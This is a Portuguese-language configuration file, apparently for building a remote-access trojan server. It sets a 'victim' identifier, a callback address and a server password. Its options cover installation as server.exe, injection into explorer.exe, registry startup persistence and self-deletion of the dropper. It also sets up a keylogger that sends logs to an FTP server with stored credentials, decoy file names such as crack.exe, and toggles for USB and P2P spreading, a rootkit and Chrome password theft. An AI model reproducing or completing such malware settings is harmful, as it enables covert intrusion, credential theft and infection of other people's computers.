[settings]
endereco0=127.0.0.1|81
endereco1=
endereco2=
endereco3=
endereco4=
endereco5=
endereco6=
endereco7=
endereco8=
endereco9=
endereco10=
endereco11=
endereco12=
endereco13=
endereco14=
endereco15=
endereco16=
endereco17=
endereco18=
endereco19=
identificacao=v�tima
createserverpassword=abcd1234
mostrarsenha=1
instalarservidor=1
localinstalacao=4|c:\dir\install\
inicializacao0={08B0E5JF-4FCB-11CF-AAA5-00401C6XX500}
inicializacao1=HKLM
inicializacao2=HKCU
inicializacao3=Policies
hklm=0
hkcu=0
activexstartup=1
policiesstartup=1
infiltrarprocesso=1
infiltrarprocessonome=explorer.exe
persistencia=0
ocultar=0
mudardata=0
melt=1
mutexname=***MUTEX***
diretorio=install
nomearquivo=server.exe
exibirmensagem=0
iconemsg=1
botaomsg=0
mensagem0=t�tulo da mensagem
mensagem1=texto da mensagem
keylogger0=1
keylogger1=1
keylogger2=0
keyloggerstrings0=ftp.server.com
keyloggerstrings1=logs/
keyloggerstrings2=ftp_user
keyloggerstrings3=gfhtrhehtW
keyloggerstrings4=21
keyloggertimer=5
debug0=1
debug1=1
debug2=1
debug3=1
debug4=1
debug5=1
debug6=1
debug7=1
debug8=1
debug9=1
debug10=1
debug11=1
compactar=1
p2pnames=server.exe#crack.exe#
usbspreader=0
p2pspreader=0
rootkiton=0
chromepass=0
chromepasslink=http://www.server.com/sqlite3.dll
